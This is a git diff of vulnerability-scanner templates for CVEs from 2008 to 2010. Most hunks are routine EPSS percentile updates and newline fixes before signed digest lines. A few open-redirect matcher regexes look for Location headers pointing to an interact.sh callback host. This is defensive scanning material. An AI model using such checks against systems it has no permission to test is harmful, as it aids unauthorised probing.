4ab8ca9e9e..9241ba8a90 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - epss-percentile: 0.85397 + epss-percentile: 0.85392 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 11b8f96a40..64f7433cf8 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81303 + epss-percentile: 0.81287 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 8faf00fda8..54b8a8ffc4 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-1547 cwe-id: CWE-601 epss-score: 0.02834 - epss-percentile: 0.89604 + epss-percentile: 0.896 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100fda42720acd0219bd8ded7001cf7117170fe124ca5301f38e5a263fdb932570302206c5528bcc30b78a42e5e430dcf5c97b5d4b743a2afb56c3fbd3d9f8375e65f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fda42720acd0219bd8ded7001cf7117170fe124ca5301f38e5a263fdb932570302206c5528bcc30b78a42e5e430dcf5c97b5d4b743a2afb56c3fbd3d9f8375e65f27:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 47c13e37fa..9e91542641 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - epss-percentile: 0.67785 + epss-percentile: 0.67779 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cd9b89d5dcd1a766ed4fd1b07468d3d1d7708c5a75bf2bdd3384179927ce7811022100e18fa3326e1f27806a7289079fd00ce63d2371a55d9f967d6c646a8a7e31a1c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100cd9b89d5dcd1a766ed4fd1b07468d3d1d7708c5a75bf2bdd3384179927ce7811022100e18fa3326e1f27806a7289079fd00ce63d2371a55d9f967d6c646a8a7e31a1c8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 652b138c36..a104001847 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - epss-percentile: 0.92897 + epss-percentile: 0.92889 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 135f859064..026f84f36d 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - epss-percentile: 0.8208 + epss-percentile: 0.8206 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a6a7cb3538fd9b5e197416851ff4b0befbc9d95aa9143933f0dc683e9f1579be02210085d0f2bb938cb2db2c46ba97d41460e463dd2d78cb83e8e31138252083d5f39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a6a7cb3538fd9b5e197416851ff4b0befbc9d95aa9143933f0dc683e9f1579be02210085d0f2bb938cb2db2c46ba97d41460e463dd2d78cb83e8e31138252083d5f39c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index e796185545..408a2769c7 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c07845b098bfaf4d31a1acba62a4a6001a3fb396285c29ac960e07d6d7dc552022100903532a7960d07f403df9703729dffcfd5d339b2bb05a3dd7f92b50a939652de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206c07845b098bfaf4d31a1acba62a4a6001a3fb396285c29ac960e07d6d7dc552022100903532a7960d07f403df9703729dffcfd5d339b2bb05a3dd7f92b50a939652de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index e429b41ee0..315b55a6a2 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88567 + epss-percentile: 0.88568 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index c5ea3263c6..e463b811ce 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.00824 - epss-percentile: 0.79978 + epss-percentile: 0.79963 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 9f40f48153..a2cfa778d0 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.73894 + epss-percentile: 0.73887 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022029f62e06dca30f4568de2c0de4407c641911c26884b4bc97917a6d2143c3e7e7022100f2dbbfea9140890786775f29ee2a7a95ec59b47c564b137eec57919d27ed8dc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022029f62e06dca30f4568de2c0de4407c641911c26884b4bc97917a6d2143c3e7e7022100f2dbbfea9140890786775f29ee2a7a95ec59b47c564b137eec57919d27ed8dc0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index a6fc7463c9..2c1d46cd47 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.01029 - epss-percentile: 0.82168 + epss-percentile: 0.82151 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 69f65f860e..574c2d7819 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - epss-percentile: 0.71409 + epss-percentile: 0.71402 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022038c0f95ef8c5174738edc57326a2eb363f5fec6b4e9e2a5544a43f5d97de705e02205c6ba78678b9fc761aa630e9b70ad75742919c54da3169d6135508c715c515d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022038c0f95ef8c5174738edc57326a2eb363f5fec6b4e9e2a5544a43f5d97de705e02205c6ba78678b9fc761aa630e9b70ad75742919c54da3169d6135508c715c515d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 06047eb606..f650cd0a5a 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.6909 + epss-percentile: 0.6908 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dad85c46fd405a22b1035e8fb72301f9a3a278695f0706bbd703df61fdc801e0022100d41a94405efd345e493ac3e872709792f383b5e83973906e5635e761929b723d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100dad85c46fd405a22b1035e8fb72301f9a3a278695f0706bbd703df61fdc801e0022100d41a94405efd345e493ac3e872709792f383b5e83973906e5635e761929b723d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 8ab99ae911..0b6c5fa8a8 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.69971 + epss-percentile: 0.69965 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 500 -# digest: 490a00463044022012ee0e401b3c927c63ad614c2176753273176718d04287d964b63e9ba5b94ed0022048571270ed8b065e31bc56acd9a46376688658b8fec65170aeb31bb58477ef13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022012ee0e401b3c927c63ad614c2176753273176718d04287d964b63e9ba5b94ed0022048571270ed8b065e31bc56acd9a46376688658b8fec65170aeb31bb58477ef13:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 8dcc195240..795176b9f1 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-7269 cwe-id: CWE-20 epss-score: 0.01358 - epss-percentile: 0.84722 + epss-percentile: 0.84691 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450221008773efd5379c28078d619e8aed577c03cc4e1effe84548d6a9889350a7f88055022071991934bcc80c468b72a491d9493499bdafabe332278acfe813bb4932844d83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008773efd5379c28078d619e8aed577c03cc4e1effe84548d6a9889350a7f88055022071991934bcc80c468b72a491d9493499bdafabe332278acfe813bb4932844d83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 064ea10d49..8bdc31346a 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-0347 cwe-id: CWE-59 epss-score: 0.10982 - epss-percentile: 0.94557 + epss-percentile: 0.94555 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 68f1b1da65..756dba04f9 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 - epss-percentile: 0.99714 + epss-percentile: 0.99716 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 7ff3a38da5..4c6ada8c47 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.91149 + epss-percentile: 0.91145 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 692b370095..89b90d8fee 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - epss-percentile: 0.97963 + epss-percentile: 0.97966 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e47bb09ce2ba9c2cfd3607bee60f02a9ef1e8abcd360f9ae5720359e27c7793022100fe4939bbc91cabb0e62e081486f4c60acfb294f6b2daeb11e93653a272b10850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205e47bb09ce2ba9c2cfd3607bee60f02a9ef1e8abcd360f9ae5720359e27c7793022100fe4939bbc91cabb0e62e081486f4c60acfb294f6b2daeb11e93653a272b10850:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index ccd8ea0397..3984961440 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77032 + epss-percentile: 0.77015 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4e7469e841e32b9d5ecdc1720f29c5cc0c8c02cef3dfbfa4d9ca7a1d4e54dc202204f1f24043a8c5939657b3eaecb94acdc1a1284e6e7cec9dcec7905e4e9089eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b4e7469e841e32b9d5ecdc1720f29c5cc0c8c02cef3dfbfa4d9ca7a1d4e54dc202204f1f24043a8c5939657b3eaecb94acdc1a1284e6e7cec9dcec7905e4e9089eb0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 7d43cf4eff..14cb6f53f9 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1558 cwe-id: CWE-22 epss-score: 0.00891 - epss-percentile: 0.80792 + epss-percentile: 0.80782 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 632b74070e..8302108f29 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.37553 - epss-percentile: 0.9683 + epss-percentile: 0.96829 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210093c2833853733c7dc56f6fee26f49fb70b1b9e8707b4c927489d925dd62a683602201d137ac57e2a13be346854aeb2e2956151a2d2bf7c7d7089260451da95a9f9d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210093c2833853733c7dc56f6fee26f49fb70b1b9e8707b4c927489d925dd62a683602201d137ac57e2a13be346854aeb2e2956151a2d2bf7c7d7089260451da95a9f9d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index c65b6adb5d..b7256a1f50 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00797 - epss-percentile: 0.79641 + epss-percentile: 0.79631 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 867d54ad6b..5386750df0 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2009-2100 cwe-id: CWE-22 epss-score: 0.00517 - epss-percentile: 0.74101 + epss-percentile: 0.74095 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205ee6838326f115cb349a0d22fa9f805b71465582d2bf31f13b55c01ca5055512022100aee9ba0a2adaa67d33ce1483bec4f3c140cbbea776f9a2097f4f70919c24721f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205ee6838326f115cb349a0d22fa9f805b71465582d2bf31f13b55c01ca5055512022100aee9ba0a2adaa67d33ce1483bec4f3c140cbbea776f9a2097f4f70919c24721f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 9c8ebef9cd..b15f64bb44 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - epss-percentile: 0.69485 + epss-percentile: 0.69476 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb0c0e9e0a7b80152613d1ce995387886a0094369416b38ffcfce8853e57adfd02207ea0a563845e50812458c254a9fd3994801b129c710e43362c46a72d251f935b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eb0c0e9e0a7b80152613d1ce995387886a0094369416b38ffcfce8853e57adfd02207ea0a563845e50812458c254a9fd3994801b129c710e43362c46a72d251f935b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 64081425b6..fe8425135f 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78165 + epss-percentile: 0.78153 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 6a95455283..540735bff3 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87399 + epss-percentile: 0.87394 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100deb39ee8d31f7875a738a7a40f9f00465adfad9b9ff6d621362f7df4c623f9bd022100f012a8ec69fedf1cab698f64f791a699f26ca50de2fc001f3f3d5194ac3f8a6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100deb39ee8d31f7875a738a7a40f9f00465adfad9b9ff6d621362f7df4c623f9bd022100f012a8ec69fedf1cab698f64f791a699f26ca50de2fc001f3f3d5194ac3f8a6f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index c87f384fa9..912e0e5e34 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00697 - epss-percentile: 0.77997 + epss-percentile: 0.77987 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220764ceb646b9fc9b2da9e4aea4fcdd1e30796ca6755ff8877ecd4e7537ae0007502210093902c463a018835b55a0fe5d134e63eb34c00dcb8c8e24b8e7395478fc573a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220764ceb646b9fc9b2da9e4aea4fcdd1e30796ca6755ff8877ecd4e7537ae0007502210093902c463a018835b55a0fe5d134e63eb34c00dcb8c8e24b8e7395478fc573a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index c4478a51ba..dd1d58cdbf 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022071bc2de3d904d3f1b365147b9020a016a8c1889526b4a30fbad0e24b9dc9752102204000d0a40e6f8a4f65e422b336a1dc36d6c55924e7647b80b4629853a0880b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022071bc2de3d904d3f1b365147b9020a016a8c1889526b4a30fbad0e24b9dc9752102204000d0a40e6f8a4f65e422b336a1dc36d6c55924e7647b80b4629853a0880b5d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 6032556a51..6ddf82f81d 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - epss-percentile: 0.59418 + epss-percentile: 0.59397 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -35,4 +35,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100afa29105e1450795c6c4658dd320f27acb3f35ce1983b7978153cf84f4b84706022100d7987de41bf54f39f03c6cfd9449660940e9aee56c1dd514c4343364720b97c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100afa29105e1450795c6c4658dd320f27acb3f35ce1983b7978153cf84f4b84706022100d7987de41bf54f39f03c6cfd9449660940e9aee56c1dd514c4343364720b97c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 5e9e90072a..3ff882a1bd 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220214508fcd3bf9daff9b007372be27bbc14706dc02a8f0e2bf4f8023c39a8ac060220363f760694568cd1e35f5c9d12fa4d082bc26b0bf32542a640e1c31f648dbae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220214508fcd3bf9daff9b007372be27bbc14706dc02a8f0e2bf4f8023c39a8ac060220363f760694568cd1e35f5c9d12fa4d082bc26b0bf32542a640e1c31f648dbae2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index fd803907ad..a1d262e9c4 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.0586 - epss-percentile: 0.92622 + epss-percentile: 0.92614 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 593d971189..163ef56608 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - epss-percentile: 0.84525 + epss-percentile: 0.84496 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220467b5098499d90f5ce38b9b03e4502b026e5369bbc03e7c81148debbcedd400e02204fa5416effe711f3aaa6f12d8d1923ebf1571af67c38f536ae4398e55cdcd11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220467b5098499d90f5ce38b9b03e4502b026e5369bbc03e7c81148debbcedd400e02204fa5416effe711f3aaa6f12d8d1923ebf1571af67c38f536ae4398e55cdcd11f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 9c6709659c..191551a731 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204fc1d7b56d8efaa092939b0dde91c829143a9d58e5b4b79a723d832c9784bd940220744b39dc37e016fe498889362f97d44a2a801e2b8f1f974a1a14f5d08db6d3f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204fc1d7b56d8efaa092939b0dde91c829143a9d58e5b4b79a723d832c9784bd940220744b39dc37e016fe498889362f97d44a2a801e2b8f1f974a1a14f5d08db6d3f2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 85f272b30f..24d4a7e059 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83238 + epss-percentile: 0.8323 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 94417dc217..92adc1a112 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ 